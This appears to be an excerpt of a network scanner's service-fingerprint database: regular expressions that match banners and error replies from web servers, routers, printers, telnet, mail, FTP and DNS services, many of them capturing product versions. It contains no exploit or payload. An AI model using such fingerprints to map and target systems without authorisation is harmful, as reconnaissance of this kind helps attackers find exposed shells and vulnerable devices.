+\xf2\xfa\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\0\0\0\0\0\0\0\0 +HTTP/1\.1 501 Not Implemented\r\nCache-Control: no-cache, must-revalidate, max-age=0\r\nContent-Type: text/html; charset=UTF-8\r\nContent-Length: \d+\r\nConnection: close\r\n\r\n

Not Implemented

Whatever the heck you just requested, I can't generate\. +HTTP/1\.0 501 Document Follows\r\nContent-Type: text/html\r\nContent-Length: 106\r\n\r\n501 Method Not Implemented\r\n

501 Method Not Implemented

\r\n +HTTP/1\.0 400 Bad Request\r\n.*Server: PeopleSoft PSRENSRV/([\w._-]+)\r\n.*PeopleSoft PSRENSRV/[\w._-]+ on http://([\w._-]+):\d+ +<\?xml version=\"1\.0\" encoding=\"UTF-8\"\?>\n\n\t\n\t\t([\w._-]+)\n\t\t[\d.]+\n\t\n\t\n\t\t\n\t\t\tNo destination specified\n\t\t\n\t\n\n\n +0, 0: ERROR: UNKNOWN-ERROR\n +0 , 0 : ERROR : UNKNOWN-ERROR\r\n +0 , 0 : ERROR : INVALID-PORT\r\n + : ERROR : UNKNOWN-ERROR\r\n +0, 0 : ERROR : X-INVALID-REQUEST\r\n +0 , 0 : ERROR : INVALID-PORT\r\n0 , 0 : ERROR : INVALID-PORT\r\n +0, 0 : ERROR : INVALID-PORT\r\n +0,0 : ERROR : INVALID-PORT\r\n +0 , 0 : ERROR :INVALID-PORT\r\n + : USERID : UNIX : ([-\w_]+) + : USERID : UNIX : [a-z]{4,8}\r\n +1 , 1 : USERID : OTHER : chuck-the-bsd-deamon\r\n +, : USERID : UNIX : [^\r\n]+\r\n +\* OK IMAP4 1\.0 server ready\r\n\* BAD Argument\r\n +ERR password required\r\nERR password required\r\n +ERR administrator password required\r\nERR administrator password required\r\n + \r\nSorry, that nickname format is invalid\.\r\r\n +:([-\w_.]+) 421 \r\n\r\n :\r\n\r\n unimplemented protocol request\r\n:[-\w_.]+ 421 \r\n\r\n :\r\n\r\n unimplemented protocol request\r\n +\+OK \r\n-ERR XXX authorization first\r\n +HLO 0 0 \. 0 71\r\nContent-type: application/vnd\.laserfiche\.lrnp\r\n\r\nLRNP/1\.1\r\n\r\nlistener\r\nEND\r\nERR 0 1 \. 71 80\r\nContent-type: application/vnd\.laserfiche\.lrnp\r\n\r\n451 0 Invalid message \(-2001\)\r\nEND\r\nMSG 0 2 \. 151 58\r\nContent-type: application/vnd\.laserfiche\.lrnp\r\n\r\nCLOSE 0\r\nEND\r\n +ERROR: Command doesn't seem to be followed by a space followed by arguments\n +.\x08\0\0 +500 access denied: Check networking/linuxconf network access\r\n +BEGIN\n\r\nERROR\nDATA\n1\nbad send packet\nEND\nBEGIN\n\r\nERROR\nDATA\n1\nbad send packet\nEND\n +\x02\x02 +ERROR\r\nERROR\r\n +\x82\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0 +ERROR: Unknown request number\. +ERROR: Invalid password\.\nERROR: Invalid password\.\n +HP OpenView OmniBack II ([-.\w]+): INET, +\0\0\xfa\xda\0\x02 +598::Command not recognized\.\r\n598::Command not recognized\.\r\n| p|Mercury/32 PH addressbook server +\+OK POP3 ([-.+\w]+) v(\d[-.\w]+) server ready\r\n +\+OK POP3 \[([-.+\w]+)\] (\d[-.\w]+) server ready\r\n +\+OK POP3 \[([-.\w]+)\] v(200[-.\w]+) server ready\r\n-ERR Null command\r\n-ERR Null command\r\n +\+OK POP3 server ready\r\n-ERR invalid command\r\n| p/IBM OS 400 pop3d/ o|OS/400 +\+OK pop server ready\r\n +\+OK ([\w._-]+)\r\n-ERR Invalid command in current state\.\r\n-ERR Invalid command in current state\.\r\n +-ERR Invalid command\.\r\n-ERR Invalid command\.\r\n +\+OK POP3 ready\r\n-ERR invalid command\r\n +\+OK POP3 Ready ([-\w_.]+) \w+\r\n-ERR Null command, mate\r\n +\+OK POP3Proxy ready\r\n-ERR Unknown command\r\n-ERR Unknown command\r\n +EInvalid packet length\0 +EFATAL 1: invalid length of startup packet\n\0 +\xff +\xc0\0\x12Data field missing +\xff\x17Access to unopened port. +Status: 400 Bad Request\r\nContent-Length: 0\r\n\r\n +\xa8\x08C\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0 +ERR 27 +\xf1\xf8\xf2\xf6\xf3\xf3\xf0\xf0\xf3\xf8\xf7\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xe2\xf6\xf5\xf6\xf9\xc5\xf9\xc3\0\xf0\xf0\xf3\xf1\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0 +\x05\x01\0.\0\0\0\0\0\0 +\x02\0\x01\xfb\xff\xfb\xff\xff\xff\xff\xffNOSUP +SPAMD/1\.0 76 Bad header line: \r\n +ERHD +\x01\0\0\0 +SSTP/([\d.]+) 400 Bad Request\r\n\r\n\0 +\x01\0\0\0z\0\0\x003,DBServer,\d+,Restarts,\d+,\d+,UpTime,\d+,\d+,MediaServer +\xff\xfb\x03\xff\xfb\x01 +\xff\xfb\x01\xff\xfb\x03\r\nUser:\r\n\r\nUser:\r\n\r\nUser: +514 Authentication required\.\r\n +login: Password: Login incorrect\. +login: uucpd: \d+-\d+ The user is not known\.\n +%rwhois V-[\w:.-]+ ([-\w_.]+) \(by Network Solutions, Inc\. V-([\d.]+)\)\n +% No entries found for the selected source\(s\)\.\n +128 System Incompatible Windows Communicator client or server version\r\n128 System Incompatible Windows Communicator client or server version\r\n +\x02\x01 +SDPACK +\xff\xfe\x01\xff\xfd\x03\xff\xfd\x18\xff\xfd\x1f\xff\xfb\x03\xff\xfb\x01\r\nAccount Name: \r\nPassword: \r\nThis copy of the Ataman Telnetd Server is registered as licensed to:\r\n\t(.+)\r\n\r\nLogin failed: unknown user name, password or privilege incorrect\.\r\n +\xff\xfb\x01\xff\xfb\x03\r\n\r\nLogin: \r\n\r\nYou must supply a username\r\n\r\nLogin: \r\n\r\nYou must supply a username\r\n\r\nLogin: +\r\n\r\nThis is a FirstClass system, from Open Text Corporation\.\r\n\r\n\r\nFirstClass is an e-mail and conferencing system with a graphical user interface\.\r\n\r\n\r\nThe Command Line Interface is not available on this sy +\xff\xfb\x01\r\nPassword:\r\nLogged in as guest\r\n +\xff\xfb\x01Login: \r\nLogin: \r\nLogin: +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18\xff\xfd\x1f\r\nuser: \r\npassword: \r\n\r\nuser: +\xff\xfb\x01\n\r-> \n\r-> \n\r-> +bad password\r\n +\xff\xfd\"\xff\xfb\x01SSE version ([\d.]+)\r\nCopyright [\d, ]+ by Motorola\r\nUsername: +\xff\xfb\x01Password\? \r\n500 Configuration error\. Disconnecting!\n +\xff\xfb\x01\r\n\r\nlogin: \r\n\r\n\r\r\npassword: +\xff\xfb\x01\xff\xfb\x03\nTOSHIBA Maintenance Shell\. \n\rUser access verification\.\n\rlogin: +\r\nPress return:\*\*\*\*\r\nEnter Password: +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x03\r\0\n\r\0\n\r\0\n\r\0\n- NetQue AppleTalk/NetWare/TCP/LAT Printer Server +\r\n\r\nUser Access Verification\r\n\r\nPassword: \r\nPassword: \r\nPassword: \r\n% Bad passwords\r\n +\xff\xfb\x01\xff\xfe\"\xff\xfe\0\xff\xfd\x03\xff\xfd\x18\xff\xfd\x1f\r\n\r\n\r\nlogin: +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\nRead /disclaimer\.txt and have fun with yadi on your Nokia D-BOX2 - Kernel ([-\w_.]+) \( +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\nPhilips D-BOX2 - Kernel ([\w._-]+) \( +\xff\xfb\x01\n\rLogin: \n\r\n\r\n\rLogin: \n\rLogin: + 105 Access denied\.\r\n 105 Access denied\.\r\n 105 Access denied\.\r\n 105 Access denied\.\r\n +User Name: \r\r\nPassword: \r\r\nRemote MAC address: +\xff\xfb\x01\r\nAP11G login: \r\n\r\nPassword: +\xff\xfb\x01\xff\xfd\x03\xff\xfb\x03\x1b\[2J\x1b\[H \n\r\0\x1b\[H\x1b\[JPASSaPORT CS-(\d+) SW V([-\w_.]+) , HW V([-\w_.]+)\r\n\r\n +\xff\xfb\x01\xff\xfb\x03\xff\xfb\x1fError2 negotiated with client \d+ and get 1 char is a a d\. \n\r\n\r\*+\n\r\*\* +\*\*\n\r\*\* IP Phone firmware +V([\w._-]+) +\xff\xfd\0\xff\xfd\x03\xff\xfb\0\xff\xfb\x03\xff\xfb\x01\x03\x04\r\nPassword: \r\n\n\rComtrol DeviceMaster RTS ModelID: (\d+) \n\r\rNS-Link ([\w._-]+) \n\rBuilt: .*\n\rIP Addr: [\d.]+ Mask: [\d.]+ Gateway: [\d.]+ \n\rMAC Addr: ([\w ]+) \n\r\n\r\r\n\rdm> \r\nInvalid Command\r\n\rdm> +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x01\xff\xfd\x18\r\0\r\nPassword: \r\nPassword incorrect\r\n +\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03AH4222\r\nLogin: \r\n\r\nPassword: +\xff\xfe\x01\xff\xfb\x01\xff\xfc\"\xff\xfd\x1flogin: \r\nlogin: \r\nlogin: +\x1b\[24;1HUsername: \x1b\[\?25h\x1b\[24;1H\x1b\[\?25h\x1b\[24;11H\x1b\[24;11H\x1b\[\?25h\x1b\[24;11H\x1b\[24;1H\r\n\r\x1b\[\?25h\x1b\[24;11H\xff\xfd\x18\xff\xfb\x01\x1b\[2J\x1b\[\?7l\x1b\[3;23r\x1b\[\?6l\x1b\[1;1H\x1b\[\?25l\x1b\[1;1HProCurve (\w+) Switch (\w+)\r\n\rSoftware revision ([\w.]+)\r\n +\xff\xfb\x01\xff\xfb\x03\r\nWelcome to IFBD-HE05/06 TELNET Utility\.\r\nCopyright\(C\) 2005 Star Micronics co\., Ltd\.\r\n\r\n<< Connected Device >>\r\n Device Model: (\w+) \(STR_T-001\)\r\n NIC Product : IFBD-HE05/06\r\n MAC Address : ([0-9A-F:]+)\r\n\r\n\r \r\nlogin: \r\n +\xff\xfb\x01\xff\xfb\x03\nLANIER Maintenance Shell\. \n\rUser access verification\.\n\rlogin: +\xff\xfb\x01\r\nUser Name : \r\nUser Name : \r\nUser Name : +\xff\xfb\x01\xff\xfb\x03\r\n\r\nWelcome to VIP-X ([\w._-]+) from [\w._-]+\r\nTLS invalid record length\r\n\r\n\r\n\r\ninvalid username\r\n\r\nTLS version 0300 not supported\r\nenter username -> +\0\0\+\x04\0\0\0@TransBase Multiplexer error report:\nIllegal request + 501 Not Implemented\r\n.*Server: (RT-\w+) UPnP/([\w.]+) MiniUPnPd/([\w.]+)\r\n + 501 Not Implemented\r\n.*Server: DrayTek/Vigor([\w._-]+) UPnP/([\w.]+) miniupnpd/([\w.]+)\r\n +HTTP/1\.1 501 Not Implemented\r\nConnection: close\r\nContent-type: text/html\r\n\r\n501 Not Implemented

Not Implemented

The HTTP Method is not implemented by this server\.\r\n + 501 Not Implemented\r\n.*Server: Linux Mips ([\w._-]+) UPnP/([\w.]+) MiniUPnPd/([\w.]+)\r\n +HTTP/1\.1 400 Bad Request\r\nServer: Symbian/([\w._-]+) UPnP/([\d.]+)\r\nContent-Length: 151\r\n\r\n\n\n400 Bad Request\n\n

Bad Request

\n
\n +HTTP/1\.1 501 Not Implemented\r\nContent-Type: text/html\r\nConnection: close\r\nContent-Length: 149\r\nServer: Linux/([\w._-]+) DLNADOC/([\w._-]+) UPnP/([\w._-]+) MiniDLNA/([\w._-]+)\r\n +0\x82\x01\n\x02\x82\x01\x01\0 +HTTP/1\.0 400 Bad Request\r\nExpires: .*\r\nContent-Type: text/html\r\n\r\n\nBad formed request or url\n +\xff\xff\xfb& +Status: 400 Bad Request\r\nServlet-Error: Malformed data sent to JServ\r\n\r\n +sh-2\.05b\ +WTAM/1\.0 401 Unrecognized Command\n\n +Command Shell\r\n\r\n% \r\n% +201- connected\r\n407- unknown command\r\n +HELLO XBOX! +ZBXD\x01\x10\0\0\0\0\0\0\0ZBX_NOTSUPPORTED +\*\*\x18B0100000023be50\r\x8a\x11 +<\?xml version=\"1\.0\"\?>\r\n\r\n\r\n \r\n \r\n \r\n \r\n \r\n\r\n +(HTTP/1\.0) 200 OK\r\nServer: Kerio Personal Firewall\r\n +\xf6\xff\xff\xff\x10\0\0\0\0\0\0\0\0\0\0\0 +:[-\w_.]+ 451 GET :\r\n +\n\nDirectory /\n\n\n\n

Directory listing of /

+Nice try\.\.\.\r\n +HTTP/1\.1 401 Unauthorized\r\n.*WWW-Authenticate: negotiate \r\nWWW-Authenticate: digest nonce=\"\d+\", realm=\"/Search\", algorithm=\"md5\"\r\n.*Server: Twisted/([\w._-]+) TwistedWeb/([\w._-]+)\r\n +HTTP/1\.0 302 Found\r\nLocation: http://www\.distributed\.net/\r\n\r\n +\0\x79\xd0\x02\xff\xff\0\x73\x12\x4c\0\x06\x11\x49\0\x08\0\x4e\x11S\0\xd3 +=\0\0\0 +Login name: / \t\t\tIn real life: \?\?\?\r\n\r\nLogin name: GET \t\t\tIn real life: \?\?\?\r\n\r\nLogin name: HTTP/1\.0 \t\t\tIn real life: \?\?\?\r\n +Login name: GET \t\t\tIn real life: \?\?\?\r\n + +-;;=\n +\.;M####\+\n +User not found\r\n +EMail : [-\w_.]+@([-\w_.]+)\r\n Real Name : \?\?\r\n Home Page : \?\?\r\n +Login name: HTTP/1\.0 In real life: \?\?\?\r\n +3That item is not currently available\.\r\n +\0\0\0\0/\x20HT +HTTP/1\.1 302 Moved\r\nContent-type: text/html\r\nConnection: close\r\nLocation: /1[012]\d{8}/l\r\n\r\n

Document +HTTP/1\.[01] \d\d\d .*\r\nServer: Xitami\r\n +HTTP/1\.[01] \d\d\d .*\r\nServer: JRun Web Server\r\n +HTTP/1\.1 403 Forbidden\r\nServer: Web Server\r\n\r\n +HTTP/1\.1 301 Moved Permanently\r\nServer: Web Server\r\nLocation: .*\r\nContent-Type: text/html\r\nContent-Length: \d+\r\n\r\nMovedMoved\r\n +HTTP/1\.1 200 OK\r\nContent-Type: text/html\r\n\r\n.*MiniShare\r\n.*Total: (\d+) files([^<]+) +HTTP/1\.0 \d\d\d .*\r\nServer: Quantum Corporation\./([\d.]+)\r\n +HTTP/1\.0 200 \(OK\) \r\nPragma: No-Cache\r\nCache-Control: no-cache\r\nDate: .*\r\nServer: HTTP Server\r\n.*Copyright \d+, \d+ Nortel Networks\. +HTTP/1\.1 \d\d\d .*\r\nServer: Jigsaw/([\w.-]+)\r\n +HTTP/1\.1 \d\d\d .*\r\nDate: .*\r\nServer: ENI-Web/R([\d_]+)\r\nWWW-Authenticate: Basic realm=\"standard@Modem\"\r\n\r\n +HTTP/1\.0 \d\d\d .*\r\nPragma: no-cach\r\nContent-Type: text/html; charset=windows-1251\r\n\r\n\r\n\r\nUserGate report area\r\n +HTTP/1\.0 200 Ok\r\nServer: httpd\r\nDate: .*\nWL700g Web Manager +HTTP/1\.0 200 OK\r\nConnection: close\r\nContent-Type: text/html; charset=iso-8859-1\r\n\r\n\r\n\r\n\r\n8 Port Gigabit Switch\r\n +HTTP/1\.0 303 Redirecting\r\nServer: httpd/[\d.]+ Python/([\d.]+)\r\n.*Cache-Control: no-store,no-cache,must-revalidate,max-age=0,post-check=0,pre-check=0\r\n.*: Redirecting\n\n

For more printserver info please open the [\d.]+ home page +:Default-Chat-Community 421 \* GET :Unknown command\r\n +:([-\w_.]+) 451 :You have not registered your connection\r\n +<\?xml version='1\.0'\?> +Invalid XML +Invalid XML +<\?xml version='1\.0' encoding='UTF-8'\?>\n\n +JAMES Remote Administration Tool ([\d.]+)\nPlease enter your login and password\nLogin id:\n +\0\0\0.~\x81.0\x81..\x03\x02\x01\x05.\x03\x02\x01\x1e.\x11\x18\x0f +ERR unknown_command Unknown\+server\+command\r\n +..\x0a\0x\x01 +ERROR\n +1INVALID REQUEST +\xfb\xff\xfe\xff\xfb\xff\xfe\xff\xfb\xff\xfe\xff| p|Novell NetWare/IP +SOURCETABLE 200 OK\r\nServer: NTRIP Caster ([\w._-]+)/([\w._-]+)\r\nContent-Type: text/plain\r\n +\xe3\r\n\r\n\0\x01\0.\0vInvalid protocol verification, illegal ORMI request or request performed with an incompatible version of this protocol +\xe3\r\n\r\n\0\x01\0\x03\x0b\0vInvalid protocol verification, illegal ORMI request or request performed with an incompatible version of this protocol +-ERR \[SYS/PERM\] Fatal error: tls_start_servertls\(\) failed\r\n +-ERR Fatal error: pop3s: required OpenSSL options not present\r\n +EFATAL: invalid length of startup packet\n\0 +action=dunno\n\n +-ERR wrong number of arguments for 'get' command\r\n +0 serverclose 0\n +HTTP/1\.0 401 Unauthorized\r\nConnection: close\r\nContent-Type: text/html; charset=ISO-8859-1\r\nWWW-Authenticate: Basic realm=\"server\r\nContent-Length: 166\r\n +HTTP/1\.0 200 OK\r\nServer: SetiQueue/(\d+)\r\n +ICY \d\d\d .*SHOUTcast Distributed Network Audio Server/posix.v([\d.]+) +HTTP/1\.1 405 Method Not Allowed\r\nDate:0000-01-01T18:54:43\r\nContent-Type: application/soap\+xml; charset=\"utf-8\"\r\n\r\n +\xff\xfb\x03\xff\xfb\x01\xff\xfbi\r\n\tWelcome to Magicunix's TCP Server\.\r\n\r\n\r\nLogin: P/1\.0\r\nPassword: \r\nLogin incorrect\r\nLogin: +\xff\xfb\x01\xff\xfb\x03telnet@CER(\w+)>GET / HTTP/1\.0\r\nInvalid input -> GET / HTTP/1\.0\r\nType \? for a list\r\n +HTTP/1\.0 503 Directory busy, try again later\r\n\r\n +HTTP/1\.1 \d\d\d .*\r\nWWW-Authenticate: Basic realm=\"([\w._-]+)\"\nEXT:\r\nServer: *Linux/([\w._-]+), UPnP/([\w._-]+), pvConnect UPnP SDK/([\w._-]+)\r\n +HTTP/1\.1 200 OK\r\nDate: .*\r\nServer: Linux/2\.x UPnP/([\w._-]+) Avtech/([\w._-]+)\r\nConnection: close\r\nLast-Modified: .*\xb2\xe8\xbe\x1c\xb2\xe8\xbe\x38\x62\x03\r\n +login: Login incorrect\. +HTTP/1\.0 404 Not Found\r\nDate: .*\r\nServer: ByllSoftware Gurda/([\d.]+)\r\n +HTTP/1\.0 401 Unauthorized\r\n\r\n

401 - Authorization Failed

\0 +\n\r\nJava Whois Server ([\w._-]+) \(c\) \d+ - \d+ Klaus Zerwes zero-sys\.net\r\n\n +\x01\0\0\0\x02\0\0 + +HTTP/1\.1 200 OK\r\nServer: DavMail Gateway ([\w._-]+)\r\nDAV: 1, calendar-access, calendar-schedule, calendarserver-private-events, addressbook\r\n +HTTP/1\.0 400 Bad Request\r\nServer: Web Sharing\r\nContent-type: text/html\r\n\r\n400 Bad RequestThe URL you requested could not be understood by the server\. Do not include double slashes or colon characters in the URL\.\r\n\r\n +HTTP/1\.0 \d\d\d.*\r\nServer: B[iI][gG]-?IP\r\n +\x10\x1a\x0b\x00\x60\x4d +HTTP/1\.1 406 Not Acceptable\r\nCache-Control: no-cache\r\nPragma: no-cache\r\nContent-Type: text/html; charset=utf-8\r\nConnection: close\r\nContent-Length: 616\r\n\r\n\nRequest Error +\r\n400 Bad Request\r\n\r\n

400 Bad Request

\r\n
nginx
\r\n\r\n\r\n +RTSP/1\.0 400 Bad Request\r\nServer: PanWeb Server/([\w._-]+)\r\n.*Keep-Alive: timeout=60, max=2000\r\nContent-Type: text/html\r\nContent-length: 130\r\n\r\nDocument Error: Bad Request +RTSP/1\.0 403 Forbidden: Proxy not licensed\r\nSession: \w+\r\n\r\n +RTSP/1\.0 400 Bad request\nContent-type: text/html\n\n +HTTP/1\.1 400 Bad Request\r\nDate: .*\r\nServer: Unknown/0\.0 UPnP/([\d.]+) Virata-EmWeb/([-.\w]+)\r\n +(?:p9sk1@[\w._-]+ )*p9sk1@([\w._-]+)\0/bin/exportfs: auth_proxy: auth_proxy rpc write: : invalid argument\n +<\?xml version=\"1\.0\" encoding=\"UTF-8\"\?>\n\n\n \n com\.kapowtech\.robosuite\.api\.java\.rql\.RQLProtocolException: Invalid byte 1 of 1-byte UTF-8 sequence\. +\0\0\0\0\0\x84\0\x10\x7c\x9f\xfb\0\0\0\0\0 +\x04\x01\0C..\0\0\xaa\0\0\0/\x0f\xa2\x01\x0e.. Login failed\r\n\x14Microsoft SQL Server\0\0\0\xfd\0\xfd\0\0\0\0\0\x02 +\x01Permission denied\.\n +\xde\xad\xbe\xef\x04\0\xff\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x1fem\.requestparserparser\.InvError +\x16\x15\x16\x16\x16\x12XW\] +\x07version\x04bind\0\0\x10\0.\xc0\x0c\0\x10\0\x01\0\0\0\x05\0..Served by PowerDNS - http://www\.powerdns\.com +\0\x06\x81\x80\0\x01\0\x01\0\0\0\0\x07version\x04bind\0\0\x10\0\x03\xc0\x0c\0\x10\0\x03.......PowerDNS Recursor ([\w._-]+) (\Id: pdns_recursor\.cc .*?\) +\0\x06\x81\x80\0\x01\0\x01\0\0\0\0\x07version\x04bind\0\0\x10\0\x03\xc0\x0c\0\x01\0\x01\0\0\0\x03\0\x04.... +\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\x04bind\0\0\x10\0\x03 +..\0\x06\x85\0\0\x01\0\x01\0\x01\0\0\x07version\x04bind\0\0\x10\0\x03\xc0\x0c\0\x10\0\x03\0\0\0\0...[\w._-]+-RedHat-([\w._-]+\.el5_[\w._-]+)\xc0\x0c\0\x02\0\x03\0\0\0\0\0\x02\xc0\x0c +\0\x1e\0\x06\x81\x84\0\x01\0\0\0\0\0\0\x07version\x04bind\0\0\x10\0\x03 +..*\x07version\x04bind.*Incognito DNS \w+ ([\d.]+) \( +\0\x1e\0\x06\x81\x85\0\x01\0\0\0\0\0\0\x07version\x04bind\0\0\x10\0\x03 +\x01Login incorrect\.\n +\x01rexecd: Login incorrect.?\n +\x01rexecd: [-\d]+ Connexion incorrecte\.\n +\x01INTERnet ACP AUXS failure Status = %LOGIN-F-NOSUCHUSER\r\n\0 +\0\x0c\0\x06\x81\x04\0\0\0\0\0\0\0\0 +\0\x0c\0\x06\x80\x05\0\0\0\0\0\0\0\0 +\0\x0c\0\x06\x81\x84\0\0\0\0\0\0\0\0 +\0\x86\x05\x02\0\0\x07\?\0\x01\x01@\0\0\0\0\0\0\0\0\0H\Id: //ral_depot/products/IxChariot6\.50\.24/ENDPOINT/CODE/client\.c#3 \\0\0\0\x1a\x7f\0\x02\0\x0ce1_thread\0\0\x18main_process_incoming\0 +\0\^A\^@\^@\^@\^@\^@\^@\^Gversion\^Dbind\^@\^@\^P\^@\r\n-> shell restarted\.\r\n\r\n-> +\0\r\n-> trcStack aborted: error in top frame\r\ntShell restarted\.\r\n\r\n-> !1 echo_recv: -1\.\r\n +\x01krshd: Echec de l'authentification Kerberos\.\r\n\0 +\0\x1e\0\x06\0\t\0\0 +\0\x11Invalid command\n\0\0\0 +\x01krlogind: Echec de l'authentification Kerberos\.\r\n\0 +\x01in\.utrcmdd \(remote\): protocol error \(1\)\n\0 +1\0 +\0&\xeb\xefTQM\xee\[B +\0(?:\x03\x58\0)?\x6a\x01\0\0\0\0Your client is too old\. To use this server, please upgrade your client to a Freeciv 2\.2 or later\.\0\0\0\x03\0\0\x03\x01 +\xe3\r\n\r\n\0\x01\0.\0vInvalid protocol verification, illegal ORMI request or request performed with an incompatible version of this protocol +.*\Id: //ral_depot/products/current/ENDPOINT/CODE/client\.c +\x04\x01\0\(\0\0\0\0\xaa\0\x14\0\0\x0f\xa2\x01\x0eLogin failed\.\n\xfd\0\x02\0\x02\0\0\0\0 +\0\x1e\x02\x06\x01\0\0\0\0\0\0\xf1\0 +HTTP/1\.0 414 Request-URI Too Long\r\nServer: Linux/([\w._-]+) UPnP/([\w._-]+) fbxigdd/([\w._-]+)\r\nConnection: close\r\n\r\n +\0\x0c\0\0\x90\x04\0\0\0\0\0\0\0\0 +\0\x0c\0\0\x90\x84\0\0\0\0\0\0\0\0 +\0\0s\0\0\0\0\0 +\xff\0\x0e\0P\0r\0o\0t\0o\0c\0o\0l\0 \0e\0r\0r\0o\0r +\d{1,2}:\d\d:\d\d \d{1,2}/\d\d/\d{4}\n +220 ([\w_.-]+) ESMTP\r\n501 ehlo requires domain/address - see RFC-2821 4\.1\.1\.1\r\n +220 ([\w_.-]+) ready\r\n250-[\w_.-]+\r\n250 AUTH LOGIN PLAIN \r\n +cvs \[pserver aborted\]: bad auth protocol start: HELP\r\n\n? +cvs \[server aborted\]: bad auth protocol start: HELP\r\n +cvs \[server aborted\]: bad auth protocol start: HELP\r\nerror \n +cvs-pserver \[pserver aborted\]: bad auth protocol start: HELP\r\n\n +HELP\r\n +220 .*\r\n214-The following commands are recognized \(\* =>'s unimplemented\):\r\n CWD XCWD CDUP XCUP SMNT\* QUIT PORT PASV \r\n EPRT EPSV ALLO\* RNFR RNTO DELE MDTM RMD \r\n XRMD MKD XMKD PWD XPWD SIZE SYST HELP \r\n NOOP FEAT OPTS AUTH\*? CCC\* CONF\* ENC\* MIC\* \r\n PBSZ\*? PROT\*? TYPE STRU MODE RETR STOR STOU \r\n +220 FTP server ready\.\r\n214- The following commands are recognized \(\* =>'s unimplemented\)\.\r\n USER PORT TYPE MLFL\* MRCP\* DELE SYST RMD STOU \r\n PASS LPRT STRU MAIL\* ALLO CWD STAT XRMD SIZE \r\n ACCT\* EPRT MODE MSND\* REST XCWD HELP PWD MDTM \r\n SMNT\* PASV RETR MSOM\* RNFR LIST NOOP XPWD \r\n REIN\* LPSV STOR MSAM\* RNTO NLST MKD CDUP \r\n QUIT EPSV APPE MRSQ\* ABOR SITE XMKD XCUP \r\n214 End\.\r\n +220 ([-\w_.]+) FTP server \(UNIX_SV ([\d.]+)\) ready\.\r\n214-The following commands are recognized \(\* =>'s unimplemented\)\.\r\n USER PORT STOR MSAM\* RNTO NLST MKD CDUP \r\n PASS PASV APPE MRSQ\* ABOR SITE XMKD XCUP \r\n ACCT\* TYPE MLFL\* MRCP\* DELE SYST RMD STOU \r\n SMNT\* STRU MAIL\* ALLO CWD STAT XRMD SIZE \r\n REIN\* MODE MSND\* REST XCWD HELP PWD MDTM \r\n QUIT RETR MSOM\* RNFR LIST NOOP XPWD \r\n +220 FTP server ready\r\n214-The following commands are recognized:\r\nHELP\tUSER\tPASS\tQUIT\tLIST\tNLST\r\nRETR\tSTOR\tCWD\tTYPE\tPORT\tPWD\r\nSTRU\tMODE\tALLO\tACCT\tPASV\tNOOP\r\nDELE\tEPRT\tEPSV\r\n214 End of command list\.\r\n| p|TopLayer/Alcatel ftpd +220 Connection established\.\r\n214-The following commands are supported:\r\n\tUSER\tPORT\tTYPE\tABOR\tCWD \tLIST\r\n +220 FTP Server Ready\r\n.*\r\n214 Direct comments to psp@amoks\.com\.\r\n +220 FTP server ready\r\n211 HELP text\r\n +220 Connection established\.\r\n214-The following commands are supported\.\r\n USER PORT TYPE ABOR CWD LIST\r\n PASS PASV STRU PWD XCWD NLST\r\n QUIT STOR MODE XPWD NOOP HELP\r\n214 End of HELP\r\n +220 Welcome to connection\.\r\n214 FTP Server Help\.\r\n HUMAX PVR FTP Server\. \r\n214 End\r\n +(?:220-.*\r\n)?220 .*\r\n530 Please login with USER and PASS\.\r\n +220 Service Ready\r\n502 Command Not implemented\r\n +HTTP/1\.1 400 Parse error: Could not parse request line \(split\.length=1\): HELP\r\n +0 , 0 : ERROR : UNKNOWN-ERROR\r\n +HELP : USERID : UNIX : trilluser\r\n +\d+, \d+ : USERID : UNIX : [-.@\w]+\r\n +0, 0 : ERROR : UNKNOWN-ERROR +:([-\w_.]+) 451 \* :You have not registered\r\n +:([-\w_.]+) 451 \* :Register first\.\r\n +NOTICE AUTH :\*\*\* Checking Ident\r\n:([-\w_.]+) 451 \* :Register first\.\r\n +:([-\w_.]+) 290 :\.-----------------=#\[ euIRCd HelpSystem \]#=----------------\.\n +200 NNTP server ready\r\n100 Avaliable commands:\r\nARTICLE\r\nAUTHINFO\r\nBODY\r\nGROUP\r\nHEAD\r\nHELP\r\nIHAVE\r\nLAST\r\nLIST\r\nNEWGROUPS\r\nNEWNEWS\r\nNEXT\r\nPOST\r\nQUIT\r\nSLAVE\r\nSTAT\r\nXHDR\r\n\.\r\n| p|Hamster Playground/Kerio nntpd +\x01Socket \d+ received unknown command 0x48 with arguments ELP +false;error while receiving message from client\n +220 ([-.+\w]+) Generic SMTP handler\r\n214 Help not supported by this implementation\r\n +220.*?\n214-Commands supported:\r\n214- HELO 